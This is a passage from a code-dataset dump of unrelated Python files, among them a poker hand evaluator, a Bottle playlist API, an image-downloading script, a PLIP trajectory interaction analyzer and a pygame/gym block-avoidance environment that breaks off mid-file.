in x]\n hand = [x for x in start_hand if x not in jokers]\n\n bhand = best_hand(hand)\n brank = hand_rank(bhand)\n\n if len(jokers) == 0:\n return bhand\n\n for cur_hand in combinations(hand, 5):\n for joker in jokers:\n joker_bhand, jocker_brank = best_wild_hand_one_joker(cur_hand, joker)\n if is_better_rank(jocker_brank, brank):\n brank = jocker_brank\n bhand = joker_bhand\n\n if len(jokers) == 2:\n joker_bhand, jocker_brank = best_wild_hand_two_joker(hand)\n if is_better_rank(jocker_brank, brank):\n bhand = joker_bhand\n\n \"\"\"best_hand но с джокерами\"\"\"\n return bhand\n\n\ndef test_best_hand():\n print(\"test_best_hand...\")\n assert (sorted(best_hand(\"6C 7C 8C 9C TC 5C JS\".split()))\n == ['6C', '7C', '8C', '9C', 'TC'])\n assert (sorted(best_hand(\"TD TC TH 7C 7D 8C 8S\".split()))\n == ['8C', '8S', 'TC', 'TD', 'TH'])\n assert (sorted(best_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n print('OK')\n\n\ndef test_best_wild_hand():\n print(\"test_best_wild_hand...\")\n assert (sorted(best_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split()))\n == ['7C', '8C', '9C', 'JC', 'TC'])\n assert (sorted(best_wild_hand(\"TD TC 5H 5C 7C ?R ?B\".split()))\n == ['7C', 'TC', 'TD', 'TH', 'TS'])\n assert (sorted(best_wild_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n print('OK')\n\n\nif __name__ == '__main__':\n test_best_hand()\n test_best_wild_hand()\n","sub_path":"hw1_poker/poker.py","file_name":"poker.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66479379","text":"import nltk\r\nfrom utils.metrics.Metrics import Metrics\r\nfrom nltk import ngrams\r\n\r\nclass RefUniqueGram(Metrics):\r\n def __init__(self, test_text='',ref_text='', gram=3):\r\n super().__init__()\r\n self.name = 'RefUniqueGram'\r\n self.test_data = test_text\r\n self.ref_data=ref_text\r\n self.gram = gram\r\n self.sample_size = 500\r\n self.test_text=None\r\n self.reference_text = None\r\n self.is_first = True\r\n \r\n def get_score(self, ignore=False):\r\n if ignore:\r\n return 0\r\n if self.is_first:\r\n self.get_reference()\r\n self.get_test()\r\n self.is_first = False\r\n return self.get_ng()\r\n\r\n def get_ng(self):\r\n documentRef = self.get_reference()\r\n documentTest= self.get_test()\r\n length = len(documentTest) \r\n gramsRef = list()\r\n gramsTest = list()\r\n for sentence in documentRef:\r\n gramsRef += self.get_gram(sentence)\r\n \r\n for sentence in documentTest:\r\n gramsTest += self.get_gram(sentence)\r\n \r\n\r\n return len(set(gramsTest).difference(set(gramsRef)))/length\r\n\r\n def get_gram(self, tokens):\r\n grams = list()\r\n if len(tokens) < self.gram:\r\n return grams\r\n gram_generator = ngrams(tokens, self.gram)\r\n for gram in gram_generator:\r\n grams.append(gram)\r\n return grams\r\n\r\n\r\n def get_reference(self):\r\n if self.reference_text is None:\r\n reference = list()\r\n with open(self.ref_data) as ref_text:\r\n for text in ref_text:\r\n #text = text.strip().split(\" \")\r\n text= nltk.word_tokenize(text)\r\n reference.append(text)\r\n self.reference_text = reference\r\n return reference\r\n else:\r\n return self.reference_text\r\n\r\n def get_test(self): \r\n if self.test_text is None:\r\n test = list()\r\n with open(self.test_data) as test_text:\r\n for text in test_text:\r\n text = nltk.word_tokenize(text)\r\n test.append(text)\r\n self.test_text = test\r\n return test\r\n else:\r\n return 
self.test_text\r\n\r\n","sub_path":"utils/metrics/RefUniqueGram.py","file_name":"RefUniqueGram.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246922678","text":"import time\n\nstart_time = time.time()\ndef f(n):\n if n == 1 or n == 2:\n return 1\n else:\n q = 1\n p = 1\n for i in range(3, n):\n temp = p + q\n p = q\n q = temp\n\n return p + q\n\ncounter = 1\nfibs = []\n\nwhile True:\n if f(counter) % 2 == 0:\n fibs.append(f(counter))\n elif f(counter) > 4000000:\n break\n\n counter = counter + 1\n\n\nprint(sum(fibs))\nprint(\"this took\", time.time() - start_time, \"seconds to execute.\")\n","sub_path":"problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20708239","text":"from bottle import route, run\nfrom bottle import get, post, request, delete # or route\nfrom database import db_connector\n\nconnector = db_connector()\n\n@get('/playlist')\ndef get_playlists():\n from bottle import response\n from json import dumps\n res = connector.read_all_playlists()\n print(res)\n response.content_type = 'application/json'\n return dumps(res)\n\n@get('/playlist/')\ndef get_playlists(id):\n from bottle import response\n from json import dumps\n res = connector.read_one_playlist(id)\n response.content_type = 'application/json'\n return dumps(res)\n\n\n@post('/playlist')\ndef add_playlist():\n playlistname = request.forms.get('playlistname')\n print(\"inserting \"+playlistname+\"in db\")\n connector.insert_playlist_in_db(playlistname)\n\n@get('/video')\ndef get_videos():\n from bottle import response\n from json import dumps\n res = connector.read_all_videos()\n response.content_type = 'application/json'\n return dumps(res)\n\n@post('/video')\ndef add_video():\n playlistid = request.forms.get('playlistid')\n Title = request.forms.get('title')\n Thumbnail = request.forms.get('thumbnail')\n connector.insert_video_in_playlist(playlistid, Title, Thumbnail)\n\n\n@delete('/video//playlist/')\ndef delete_video_from_playlist(videoid, playlistid):\n print(\"{} {}\".format(videoid, playlistid))\n connector.remove_one_video_from_playlist( playlistid, videoid)\n\n\nif __name__ == \"__main__\":\n print(\"starting web server\")\n print(\"Run Server\")\n run(host=\"0.0.0.0\", port=8081, debug=True, reloader=True)\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459126039","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#author:zhl\n\nimport tkinter\nfrom tkinter import ttk\nimport os\n\n\nclass InfoWindow(tkinter.Frame):\n def __init__(self,master):\n frame=tkinter.Frame(master)\n frame.grid(row=0,column=1)\n\n self.ev=tkinter.Variable()\n self.entry=tkinter.Entry(frame,textvariable=self.ev)\n self.entry.pack()\n\n self.txt=tkinter.Text(frame)\n self.txt.pack()","sub_path":"python 语法基础/d15_自动化办公与鼠标键盘模拟/1.树状目录层级作业/infoWindow.py","file_name":"infoWindow.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554619461","text":"#-*- codeing = utf-8 -*-\nimport requests\nimport re\n# import time\nimport os\nprint('README!!!!!\\nREADME!!!!!\\nREADME!!!!!\\n说明:图片返回数量,范围为1到10,不提供 APIKEY 时固定为1\\nr18参数 
0为���,1为是,2为混合\\n不指定关键词填0,若指定关键字,将会返回从插画标题、作者、标签中模糊搜索的结果\\n是否使用 master_1200 缩略图,以节省流量或提升加载速度,0为不使用,默认不使用')\nnumber = int(input('请输入要下载的图片数量:'))\nif number<1 or number>10 :\n print('瞎几把输,给你一张便宜你了')\n number = 1\n# r18yn = int(input('是否r18:'))\n# if r18yn<0 or r18yn>2 :\n# print('?')\n# r18yn = 0\n\nword = input('请输入图片关键词:')\n\nif word =='0':\n word=''\n# print(type(True))\n# size = input('是否要压缩图片:')\n# if size =='0':\n# size = 'false'\n# else:\n# size = 'true'\n# print(size)\ndata = {\n \"apikey\":'', #添加apikey\n # 'r18':r18yn, #添加r18参数 0为否,1为是,2为混合\n 'keyword':word, #若指定关键字,将会返回从插画标题、作者、标签中模糊搜索的结果\n 'num':number, #一次返回的结果数量,范围为1到10,不提供 APIKEY 时固定为1\n # 'size1200':False #是否使用 master_1200 缩略图,以节省流量或提升加载速度\n }\n\n\nresponse = requests.get('https://api.lolicon.app/setu/',params=data)\nhtml = response.text\n# print(html)\nurls1 = re.findall('url\":\"(.*?)\"',html)\nurls = str(urls1)\nurls = re.sub(r'\\\\','',urls)\npattern = 'i.pixiv.cat'\nurls = re.sub(pattern,\"www.pixivdl.net\",urls)\nurl_list = re.sub(\"'\",'',urls)\nurl_list = url_list.replace('[','')\nurl_list = url_list.replace(']','')\n\nurl_list = url_list.strip(',').split(',')\n# print(url_list)\ni = 0\nd = 'D:\\\\setu\\\\'\nfor url in url_list:\n path = d + url.split('/')[-1]\n i += 1\n print('正在下载第%d张图片' % i)\n\n try:\n\n if not os.path.exists(d):\n os.mkdir(d)\n\n if not os.path.exists(path):\n\n r = requests.get(url)\n\n r.raise_for_status()\n\n with open(path, 'wb') as f:\n\n f.write(r.content)\n\n f.close()\n\n print(\"图片保存成功\")\n\n else:\n\n print(\"图片已存在\")\n\n except:\n\n print(\"图片获取失败\")\nprint('图片全部下载完成')\n\n","sub_path":"nor18.py","file_name":"nor18.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551956208","text":"import MDAnalysis as md\n\nimport pandas as pd\n\nfrom plip.structure.preparation import PDBComplex\n\nimport progressbar\n\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef plipmd(topol=None,traj=None):\n\n\tif 'gro' in topol or '.tpr' in topol:\n\t\tprint ('''\\n\\n\n\n\t\t\tWARNING: For analysis using gromacs you SHOULD use .pdb topology\n\n\t\t\tRecomended gromacs (gmx) command to generate a PDB topology file:\\n\n\n\t\t\tgmx trjconv -f xyz.gro -o xyz.pdb -s xyz.tpr\n\n\t\t\t\\n\\n\n\t\t\t''')\n\telse: pass\n\n\ttraj=list(traj.strip('[]').split(','))\n\tu = md.Universe(topol,traj)\n\n\tif len (u.segments.segids) ==1:\n\t\tprint ('''\n\t\t\tWARNING: Only one segment was identified in system topology:{} \\n\\n\n\t\t\t'''.format(list(u.segments.segids)))\n\telse: \n\t\tprint ('\\nINFO: your system contains {} segments with labels: \\n {} \\n\\n'.format(len(u.segments),list(u.segments.segids)))\n\t\tprint ('''\n\t\t\t\\nWARNING: Segments IDs are considered CHAIN names for analysis. 
Maybe you can consider to chance Segments ID\\n\\n\n\t\t\t''')\n\t\t\n\t\tuser_confirmation=input('Do you want to define chain names to segments (yes/no):\\n>')\n\n\t\tif user_confirmation=='yes':\n\t\t\tchains_from_segments=input('Type the new name (chain) for every segment (SegId) in format: SegId1,A|SegID2,B|...|SegIdn,N:\\n>')\n\t\t\tnames=chains_from_segments.replace(' ','').split('|')\n\t\t\tfor name in names:\n\t\t\t\tsegid=name.split(',')[0]\n\t\t\t\tnewName=name.split(',')[1]\n\t\t\t\tfor segment in u.segments:\n\t\t\t\t\tif segment.segid == segid:\n\t\t\t\t\t\tsegment.segid=newName\n\t\t\tprint ('\\nINFO: your system contains {} segments with labels: \\n {} \\n\\n'.format(len(u.segments),list(u.segments.segids)))\n\t\n\n\tligand_name=input ('\\n\\n1) Type the ResName of your Ligand (must be 3 letter code -example: LIG -):\\n>')\n\n\tsol_name=input ('\\n2) Type the ResName of your Water (must be 3-4 letter code -example: WAT or SOL or TIP3 -):\\n>')\n\n\tfor res in u.residues:\n\t\tif res.resname==sol_name:\n\t\t\tres.resname='HOH'\n\t\tif 'HI' in res.resname or 'HSD' in res.resname:\n\t\t\tres.resname='HIS'\n\t\tif 'CY' in res.resname:\n\t\t\tres.resname='CYS'\n\tfor atom in u.atoms:\n\t\tif atom.name=='OH2':\n\t\t\tatom.name='OW'\n\n\tSystem=u.select_atoms('protein or (resname {} or resname HOH)'.format(ligand_name),updating=True)\n\tSystem=System.select_atoms('protein or resname {} or (around 7 resname {})'.format(ligand_name,ligand_name),updating=True)\n\n\t\n\tfor ts in u.trajectory[0:1]:\n\t\tname='frame_tmp.pdb'\n\t\tPDB= md.Writer(name, multiframe=False)\n\t\tPDB.write(System)\n\t\tplip_job = PDBComplex()\n\t\tplip_job.load_pdb(name) \n\t\tplip_job.analyze()\n\t\tprint ('\\nINFO:',plip_job,'\\n')\n\t\tligand=input('3) Type the name of the ligand in trajectory to analyze (- example: LIG:S:152 -):\\n>')\n\tos.remove(name)\n\n\ttable=pd.DataFrame()\n\tindex=0\n\tprint ('\\nINFO: Your trajectory lenght is:{} steps\\n'.format(range(len(u.trajectory))))\n\tstart=int(input('4) Type the starting STEP to analyze:\\n>'))\n\tfinish=int(input('\\n5) Type the ending STEP to analyze:\\n>'))\n\tbar=progressbar.ProgressBar(max_value=finish)\n\tprint ('\\n\\n----- ----- ----- RUNNING THE ANALYSIS ----- ----- -----\\n\\n')\n\tfor i in range(start,finish):\n\t\tname='frame_tmp.pdb'\n\t\tPDB= md.Writer(name, multiframe=False)\n\t\tfor ts in u.trajectory[i:i+1]:\n\t\t\tPDB.write(System)\n\t\t\tplip_job = PDBComplex()\n\t\t\tplip_job.load_pdb(name) \n\t\t\tplip_job.analyze()\n\t\t\tinteractions = plip_job.interaction_sets[ligand]\n\t\t\tfor interaction in interactions.all_itypes:\n\t\t\t\tinteraction_type=str(type(interaction)).split('.')[-1].replace(\"'>\",\"\")\n\t\t\t\ttable.loc[index,'Frame']=ts.frame\n\t\t\t\ttable.loc[index,'Time']=ts.time\n\t\t\t\ttable.loc[index,'Residue']=interaction.restype+str(interaction.resnr)\n\t\t\t\ttable.loc[index,'Chain']=interaction.reschain\n\t\t\t\ttable.loc[index,'Ligand']=interaction.restype_l+str(interaction.resnr_l)\n\t\t\t\t\n\t\t\t\tif interaction_type == 
'hbond':\n\t\t\t\t\ttable.loc[index,'Type']='H-bond'\n\t\t\t\t\ttable.loc[index,'Acceptor']=interaction.atype\n\t\t\t\t\ttable.loc[index,'AcceptorIdx']=interaction.a.idx\n\t\t\t\t\ttable.loc[index,'Donor']=interaction.dtype\n\t\t\t\t\ttable.loc[index,'DonorIdx']=interaction.d.idx\n\t\t\t\t\ttable.loc[index,'DistanceAD']=interaction.distance_ad\n\t\t\t\t\ttable.loc[index,'DistanceAH']=interaction.distance_ah\n\t\t\t\t\ttable.loc[index,'Angle']=interaction.angle\n\t\t\t\t\ttable.loc[index,'Force']=interaction.type\n\t\t\t\t\ttable.loc[index,'ProtIsDon']=interaction.protisdon\n\t\t\t\t\n\t\t\t\telif interaction_type == 'pication':\n\t\t\t\t\ttable.loc[index,'Type']='Pi-cation'\n\t\t\t\t\ttable.loc[index,'Charge']=interaction.charge.type\n\t\t\t\t\ttable.loc[index,'ChargedAtoms']=\",\".join([i.type for i in interaction.charge.atoms])\n\t\t\t\t\ttable.loc[index,'Force']=interaction.type\n\t\t\t\t\ttable.loc[index,'RingType']=interaction.ring.type\n\t\t\t\t\ttable.loc[index,'RingAtoms']=\",\".join([i.type for i in interaction.ring.atoms])\n\t\t\t\t\ttable.loc[index,'RingAtomsIdx']=\",\".join([str(i.idx) for i in interaction.ring.atoms])\n\n\t\t\t\telif interaction_type == 'pistack':\n\t\t\t\t\ttable.loc[index,'Type']='Pi-stacking'\n\t\t\t\t\ttable.loc[index,'StackingType']=interaction.type\n\t\t\t\t\ttable.loc[index,'RecRingType']=interaction.proteinring.type\n\t\t\t\t\ttable.loc[index,'LigRingType']=interaction.ligandring.type\n\t\t\t\t\ttable.loc[index,'RecRingAtoms']=\",\".join([i.type for i in interaction.proteinring.atoms])\n\t\t\t\t\ttable.loc[index,'RecAtomsIdx']=\",\".join([str(i.idx) for i in interaction.proteinring.atoms])\n\t\t\t\t\ttable.loc[index,'LigRingAtoms']=\",\".join([i.type for i in interaction.ligandring.atoms])\n\t\t\t\t\ttable.loc[index,'LigRingAtomsIdx']=\",\".join([str(i.idx) for i in interaction.ligandring.atoms])\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'Angle']=interaction.angle\n\t\t\t\t\ttable.loc[index,'Offset']=interaction.offset \n\t\t\t\t\n\t\t\t\telif interaction_type=='saltbridge':\n\t\t\t\t\ttable.loc[index,'Type']='Salt-bridge'\n\t\t\t\t\ttable.loc[index,'NegAtoms']=\",\".join([i.type for i in interaction.negative.atoms])\n\t\t\t\t\ttable.loc[index,'NegAtomsIdx']=\",\".join([str(i.idx) for i in interaction.negative.atoms])\n\t\t\t\t\ttable.loc[index,'PosAtoms']=\",\".join([i.type for i in interaction.positive.atoms])\n\t\t\t\t\ttable.loc[index,'PosAtomsIdx']=\",\".join([str(i.idx) for i in interaction.positive.atoms])\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'ProtIsPos']=interaction.protispos\n\t\t\t\t\t\n\t\t\t\telif interaction_type == 'hydroph_interaction':\n\t\t\t\t\ttable.loc[index,'Type']='Hydrophobic'\n\t\t\t\t\ttable.loc[index,'RecAtom']=interaction.bsatom.type\n\t\t\t\t\ttable.loc[index,'RecAtomIdx']=interaction.bsatom.idx\n\t\t\t\t\ttable.loc[index,'LigAtom']=interaction.ligatom.type\n\t\t\t\t\ttable.loc[index,'LigAtomIdx']=interaction.ligatom.idx\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\t\n\t\t\t\telif interaction_type == 
'waterbridge':\n\t\t\t\t\ttable.loc[index,'Type']='Water-bridge'\n\t\t\t\t\ttable.loc[index,'AccType']=interaction.atype\n\t\t\t\t\ttable.loc[index,'DonType']=interaction.dtype\n\t\t\t\t\ttable.loc[index,'WaterIdx']=interaction.water_orig_idx\n\t\t\t\t\ttable.loc[index,'DistanceAWat']=interaction.distance_aw\n\t\t\t\t\ttable.loc[index,'DistanceDWat']=interaction.distance_dw\n\t\t\t\t\ttable.loc[index,'AngleDon']=interaction.d_angle\n\t\t\t\t\ttable.loc[index,'AngleWat']=interaction.w_angle\n\t\t\t\t\ttable.loc[index,'ProtIsDon']=interaction.protisdon\n\n\t\t\t\telif interaction_type == 'halogenbond':\n\t\t\t\t\ttable.loc[index,'Type']='X-bond'\n\t\t\t\t\ttable.loc[index,'Acceptor']=interaction.acctype\n\t\t\t\t\ttable.loc[index,'Donor']=interaction.acctype\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'DonAngle']=interaction.don_angle\n\t\t\t\t\ttable.loc[index,'AccAngle']=interaction.acc_angle\n\t \n\t\t\t\telif interaction_type=='metal_complex':\n\t\t\t\t\ttable.loc[index,'Type']='Metal-complex'\n\t\t\t\t\ttable.loc[index,'MetalType']=interaction.metal.type\n\t\t\t\t\ttable.loc[index,'Idx']=interaction.metal.idx\n\t\t\t\t\ttable.loc[index,'TargetType']=interaction.target_type\n\t\t\t\t\ttable.loc[index,'FunctGroup']=interaction.target.fgroup\n\t\t\t\t\ttable.loc[index,'Geometry']=interaction.geometry\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'Location']=interaction.location\n\t\t\t\t\n\t\t\t\tindex=index+1 \n\t\tbar.update(i+1)\n\t\tos.remove(name)\n\t\t\n\tprint ('\\n\\n----- ----- ----- SAVING THE RESULTS, PLEASE WAIT ----- ----- -----\\n\\n')\t\n\ttable.set_index(['Frame','Time'], inplace=True)\n\ttable.sort_index(inplace=True)\n\ttable.to_excel('Interactions_Table.xlsx')\n\tprint ('\\n\\n***** ***** ***** ALL DONE, DATA SAVED ON: Interactions_Table.xlsx ***** ***** *****\\n\\n')\t \nif __name__ == \"__main__\":\n\tplipmd(sys.argv[1],sys.argv[2])\n","sub_path":"Scripts/plipMD_V3.1.py","file_name":"plipMD_V3.1.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231737843","text":"import pygame\nACTIVE_BG = (255, 255, 255)\nINACTIVE_BG = (20, 20, 20)\nFONT = pygame.font.SysFont(\"leelawadee\", 20)\n\nclass InputBox:\n \n def __init__(self, screen, x, y, w, h, text=''):\n self.screen = screen\n self.rect = pygame.Rect(x, y, w, h)\n self.color = INACTIVE_BG\n self.text = text\n self.txt_surface = FONT.render(text, True, self.color)\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n # event pos is when the mouse was when the even happened\n if self.rect.collidepoint(event.pos):\n self.active = True\n else:\n self.active = False\n \n self.color = ACTIVE_BG if self.active else INACTIVE_BG\n\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += str(event.unicode)\n \n # Re-render the text.=\n self.txt_surface = FONT.render(self.text, True, self.color)\n\n def getText(self):\n return self.text\n\n def setText(self, text):\n self.text = text\n self.txt_surface = FONT.render(self.text, True, self.color)\n \n def draw(self):\n # draw text\n self.screen.blit(self.txt_surface, (self.rect.x+5, self.rect.y+5))\n # draw rectangle\n pygame.draw.rect(self.screen, self.color, self.rect, 2)","sub_path":"blank 
copy/src/buttons/input_box.py","file_name":"input_box.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"367855099","text":"\"\"\" Customized learning rate scheduler that are not implemented in pytorch \"\"\"\n\nimport torch\nfrom torch.optim.lr_scheduler import _LRScheduler\n\nclass PolyLR(_LRScheduler):\n \"\"\" Adjust learning rate by \"poly\" policy, refering to paper\n https://arxiv.org/abs/1506.04579\n and serch for \"poly\" in the full-text\n \"\"\"\n def __init__(self, optimizer,\n init_lr= 1e-5, # The initial learning rate\n max_iter= 100, # The maximum number of calling step of this instance\n power= 0.9,\n ):\n self.init_lr = init_lr\n self.max_iter = max_iter\n self.power = power\n self.step_count = -1 # considering super class will call step() once\n super().__init__(optimizer)\n\n def step(self):\n self.step_count += 1\n assert self.step_count <= self.max_iter, \"Call step() should not be more than {} times\".format(self.max_iter)\n\n lr = self.init_lr * (1 - self.step_count / self.max_iter)**self.power\n\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n return lr\n","sub_path":"vos/algo/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"256129755","text":"#!/usr/bin/python3\n\"\"\" The rectangle module\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" A Rectangle class inherited from Base class\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" class constructor\n Args:\n width: width of the rectangle\n height: height of the rectangle\n x(int): int value\n y(int): int value\n id: Base class' id attribute\n\n \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter method\"\"\"\n return self.__width\n\n @width.setter\n def width(self, width):\n if type(width) is not int:\n raise TypeError(\"{} must be an integer\".format(\"width\"))\n if width <= 0:\n raise ValueError(\"{} must be > 0\".format(\"width\"))\n self.__width = width\n\n @property\n def height(self):\n \"\"\" height getter method\"\"\"\n return self.__height\n\n @height.setter\n def height(self, height):\n if type(height) is not int:\n raise TypeError(\"{} must be an integer\".format(\"height\"))\n if height <= 0:\n raise ValueError(\"{} must be > 0\".format(\"height\"))\n self.__height = height\n\n @property\n def x(self):\n \"\"\" x getter method\"\"\"\n return self.__x\n\n @x.setter\n def x(self, x):\n if type(x) is not int:\n raise TypeError(\"{} must be an integer\".format(\"x\"))\n if x < 0:\n raise ValueError(\"{} must be >= 0\".format(\"x\"))\n self.__x = x\n\n @property\n def y(self):\n \"\"\"y getter method\"\"\"\n return self.__y\n\n @y.setter\n def y(self, y):\n if type(y) is not int:\n raise TypeError(\"{} must be an integer\".format(\"y\"))\n if y < 0:\n raise ValueError(\"{} must be >= 0\".format(\"y\"))\n self.__y = y\n\n def area(self):\n \"\"\" returns the area value of the Rectangle instance\"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\"prints in stdout the Rectangle instance with the character #\"\"\"\n for i in range(0, self.__y):\n print()\n for row in range(0, self.__height):\n for j in range(0, self.__x):\n print(\" \", end=\"\")\n for h in range(0, 
self.__width):\n print('#', end=\"\")\n print()\n\n def __str__(self):\n \"\"\"returns a string\"\"\"\n return (\"[Rectangle] ({}) {}/{} - {}/{}\".format(self.id,\n self.__x, self.__y, self.__width, self.__height))\n\n def update(self, *args, **kwargs):\n \"\"\"assigns an argument to each attribute\"\"\"\n if args:\n attributes = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n for i, j in enumerate(args):\n if i < len(attributes):\n setattr(self, attributes[i], j)\n else:\n for key, value in kwargs.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"Returns the dictionary representation of a Rectangle\"\"\"\n return {'x': self.x, 'y': self.y, 'id': self.id, 'height':\n self.height, 'width': self.width}\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266000353","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\ndef stub_copy_volume_to_image(self, context, volume, metadata, force):\n image_metadata = {\n \"status\": \"uploading\",\n \"container_format\": \"bare\",\n \"image_name\": \"test\",\n \"visibility\": \"private\",\n \"updated_at\": \"2017-06-05T08:44:28.000000\",\n \"image_id\": \"de75b74e-7f0d-4b59-a263-bd87bfc313bd\",\n \"display_description\": None,\n \"id\": \"3a81fdac-e8ae-4e61-b6a2-2e14ff316f19\",\n \"size\": 1,\n \"disk_format\": \"raw\",\n \"volume_type\": None,\n \"protected\": False\n }\n return image_metadata\n\n\ndef stub_manage_existing(self, req, body):\n volume = {\n \"host\": \"null\",\n \"cluster\": \"cluster@backend\",\n \"ref\": {\n \"source-name\": \"existingLV\",\n \"source-id\": \"1234\"\n },\n \"name\": \"New Volume\",\n \"availability_zone\": \"az2\",\n \"description\": \"Volume imported from existingLV\",\n \"volume_type\": \"null\",\n \"bootable\": True,\n \"metadata\": {\n \"key1\": \"value1\",\n \"key2\": \"value2\"\n }\n }\n\n return volume\n","sub_path":"cinder-14.0.0/cinder/tests/functional/api_sample_tests/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347039429","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\nclass Solution(object):\n def maximalSquare(self, matrix):\n lenN = len(matrix)\n if not lenN:\n return 0\n lenM = len(matrix[0])\n #dp = [[0 for i in range(lenM)] for j in range(lenN)]\n matrix = [[int(i) for i in j] for j in matrix]\n result = 0\n for i in range(0, lenN):\n if matrix[i][0]:\n result = 1\n break\n for i in range(0, lenM):\n if matrix[0][i]:\n result = 1\n break\n for i in range(1, lenN):\n for j in range(1, lenM):\n if matrix[i][j]:\n matrix[i][j] = min(matrix[i-1][j-1], matrix[i-1][j], matrix[i][j-1]) + 1\n result = max(result, matrix[i][j])\n\n return result * result\n\n\ns = 
Solution()\nprint(s.maximalSquare([[]]))\nprint(s.maximalSquare([[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]))\n","sub_path":"221.py","file_name":"221.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336335453","text":"import gym\nfrom gym import spaces\nfrom util.constants import *\nfrom util.functions import *\nfrom pygame import *\nfrom pygame.locals import *\nimport numpy as np\n\ndef next_observation(disp, width, height):\n\tnext_state = (surfarray.pixels2d(disp.subsurface((0,0,width,height)).copy())) \n\tnext_state[next_state == 16777215] = 0\n\tnext_state[next_state == 65280] = 1\n\treturn next_state\n\nclass BlockAvoid(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\n\tdef __init__(self):\n\t\tsuper(BlockAvoid, self).__init__()\n\t\tself.disp = display.set_mode((screen_width, screen_height), 0, 32)\n\t\tself.N_DISCRETE_ACTIONS = 3\n\t\tself.WIDTH = int(screen_width/agent_vision)\n\t\tself.HEIGHT = int(screen_height - ground_height)\n\t\tself.action_space = spaces.Discrete(self.N_DISCRETE_ACTIONS)\n\t\tself.observation_space = spaces.Box(low=0, high=1, shape=(self.WIDTH, self.HEIGHT), dtype=np.uint8)\n\n\tdef step(self, action):\n\t\tglobal character_position\n\t\tif action == 1:\n\t\t\tcharacter_position[1] -= character_jump_power\n\t\telif action == 2:\n\t\t\tcharacter_position[1] += character_jump_power\n\n\t\tif character_position[1]<0:\n\t\t\tcharacter_position[1] = 0\n\t\telif character_position[1] > screen_height-character_dimensions[1]-ground_height:\n\t\t\tcharacter_position[1] = screen_height-character_dimensions[1]-ground_height\n\t\tgenerate_terrain()\n\t\treward = calculate_reward()\n\t\tnext_state = next_observation(self.disp, self.WIDTH, self.HEIGHT)\n\t\tdraw_everything(self.disp, character_position)\n\t\tdone = collision_checker()\n\t\treturn next_state, reward, done, {}\t\t\n \t \n\tdef reset(self):\n\t\tglobal character_position\n\t\tcharacter_position = 